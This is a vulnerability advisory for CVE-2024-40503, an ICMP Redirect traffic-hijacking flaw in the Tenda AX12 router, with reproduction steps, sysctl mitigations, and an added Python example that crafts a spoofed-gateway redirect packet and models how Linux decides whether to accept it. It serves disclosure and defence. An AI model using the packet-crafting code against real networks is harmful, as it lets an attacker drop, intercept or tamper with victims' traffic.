CVE ID: CVE-2024-40503
CWE-940: Improper Verification of Source of a Communication Channel
Tenda AX12 router (firmware version V16.03.49.18_cn) has been confirmed to be vulnerable to ICMP Redirect attacks. An attacker on the same LAN can hijack the victim's traffic by sending crafted ICMP Redirect packets to the victim's device.
Please refer to the paper¹ for more details.
Environment:
- Attacker and victim are in the same LAN.
- Victim accepts ICMP Redirect packets (which is the default on most Linux distributions).
Steps:
- Under initial conditions, the victim's traffic is routed through the gateway: `ping 8.8.8.8` succeeds on the victim's machine, and `ip route get 8.8.8.8` shows the gateway's IP address as the next hop.
- The attacker sends an ICMP Redirect packet (exp.py) to the victim, redirecting its traffic for 8.8.8.8 to the attacker's IP address.
- The victim's traffic is now routed through the attacker: `ip route get 8.8.8.8` now shows the attacker's IP address as the next hop, and the connection to 8.8.8.8 fails.
The above demonstrates a DoS attack, since the attacker simply drops the redirected traffic. If the attacker instead forwards the traffic on to the real gateway, the same redirect lets it intercept and tamper with the victim's traffic (a man-in-the-middle position).
Until the vendor fixes this vulnerability, users can disable acceptance of ICMP Redirects on their devices. On Linux, this can be done by running `sysctl -w net.ipv4.conf.all.accept_redirects=0`. Note that on a host with IP forwarding disabled the kernel accepts redirects if either `net.ipv4.conf.all.accept_redirects` or the interface's own `net.ipv4.conf.<interface>.accept_redirects` is 1, so the per-interface value (and `net.ipv4.conf.default.accept_redirects`, which seeds newly created interfaces) must be set to 0 as well, and the settings should be persisted under /etc/sysctl.d/ so they survive a reboot.
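The packet the steps above rely on, and the reason the mitigation has to cover the interface setting as well as `all`, as an added Python example. This is not the exp.py referenced above and not the authors' code. The addresses (192.168.1.1 as gateway, 192.168.1.10 as victim, 192.168.1.66 as attacker, 8.8.8.8 as destination) are constructed for the example, and `would_apply` is a simplified model of the checks a Linux host makes before changing its route, not kernel code.

```python
"""Added example for this advisory (not the exp.py it refers to).

Builds the ICMP Redirect (type 5, code 1, redirect for host) that a LAN
attacker sends while spoofing the gateway's address, parses it back, and
models the checks a Linux host applies before it changes its route,
including how the accept_redirects sysctls combine. All addresses are
constructed: victim 192.168.1.10, gateway 192.168.1.1, attacker 192.168.1.66.
"""
import ipaddress
import struct
from dataclasses import dataclass


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; yields 0 when run over a valid message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int, ttl: int = 64) -> bytes:
    """Minimal 20-byte IPv4 header (no options) with a valid header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_redirect(spoofed_src: str, victim: str, new_gateway: str, flow_dst: str) -> bytes:
    """ICMP Redirect for host flow_dst, with spoofed_src as the outer source address.

    The body quotes a datagram the victim itself sent (IP header + first 8 bytes);
    here the echo request of the victim's `ping flow_dst` (ICMP checksum left 0
    for the example), so the redirect is applied to the victim's route for flow_dst.
    """
    echo_request = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1)  # type, code, cksum, id, seq
    quoted = ipv4_header(victim, flow_dst, 1, 8) + echo_request
    icmp = struct.pack("!BBH4s", 5, 1, 0, ipaddress.ip_address(new_gateway).packed) + quoted
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    return ipv4_header(spoofed_src, victim, 1, len(icmp)) + icmp


def parse_redirect(pkt: bytes):
    """Return the fields a receiver checks, or None if pkt is not a well-formed ICMP Redirect."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    icmp = pkt[(pkt[0] & 0x0F) * 4:]
    if pkt[9] != 1 or len(icmp) < 28 or icmp[0] != 5 or checksum(icmp) != 0:
        return None
    inner = icmp[8:]  # quoted IP header of the victim's own datagram
    return {
        "src": str(ipaddress.ip_address(pkt[12:16])),
        "dst": str(ipaddress.ip_address(pkt[16:20])),
        "code": icmp[1],
        "new_gateway": str(ipaddress.ip_address(icmp[4:8])),
        "inner_src": str(ipaddress.ip_address(inner[12:16])),
        "inner_dst": str(ipaddress.ip_address(inner[16:20])),
    }


@dataclass
class HostState:
    """Constructed victim state: its current gateway and its sysctl values."""
    gateway: str                 # current next hop for the quoted destination
    forwarding: bool = False     # net.ipv4.conf.<iface>.forwarding
    accept_all: int = 1          # net.ipv4.conf.all.accept_redirects
    accept_iface: int = 1        # net.ipv4.conf.<iface>.accept_redirects


def redirects_accepted(state: HostState) -> bool:
    """Rule from the kernel sysctl docs: hosts OR the two values, routers AND them."""
    if state.forwarding:
        return bool(state.accept_all and state.accept_iface)
    return bool(state.accept_all or state.accept_iface)


def would_apply(pkt: bytes, state: HostState):
    """Simplified model of the receiver's checks; returns (applies, reason)."""
    r = parse_redirect(pkt)
    if r is None:
        return False, "not a well-formed ICMP Redirect"
    if not redirects_accepted(state):
        return False, "accept_redirects is effectively disabled"
    if r["src"] != state.gateway:  # this check is why the attacker spoofs the router
        return False, "source is not the current gateway"
    if r["inner_src"] != r["dst"]:
        return False, "quoted datagram was not sent by this host"
    gw = ipaddress.ip_address(r["new_gateway"])
    if gw == ipaddress.ip_address(state.gateway) or gw.is_multicast or gw.is_unspecified \
            or gw == ipaddress.ip_address("255.255.255.255"):
        return False, "unusable new gateway"
    return True, "route to %s now via %s" % (r["inner_dst"], gw)


if __name__ == "__main__":
    spoofed = build_redirect("192.168.1.1", "192.168.1.10", "192.168.1.66", "8.8.8.8")
    print("spoofed from gateway:    ", would_apply(spoofed, HostState("192.168.1.1")))
    print("only conf.all disabled:  ", would_apply(spoofed, HostState("192.168.1.1", accept_all=0)))
    print("all + interface disabled:", would_apply(spoofed, HostState("192.168.1.1", accept_all=0, accept_iface=0)))
```

Two points the model makes visible: the victim only honors a redirect whose outer source address is its current gateway for the quoted destination, so the attack works by spoofing the router's address, which the router does not prevent (the CWE-940 aspect); and with forwarding disabled, `redirects_accepted` stays true when only `net.ipv4.conf.all.accept_redirects` is cleared, which is why the per-interface value must be cleared too.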
Shiyao Guo, Ke Xu, Xuewei Feng, Qi Li, Yuxiang Yang
Footnotes
1. Feng, Xuewei, et al. "Man-in-the-middle attacks without rogue AP: when WPAs meet ICMP redirects." 2023 IEEE Symposium on Security and Privacy (SP). IEEE, 2023.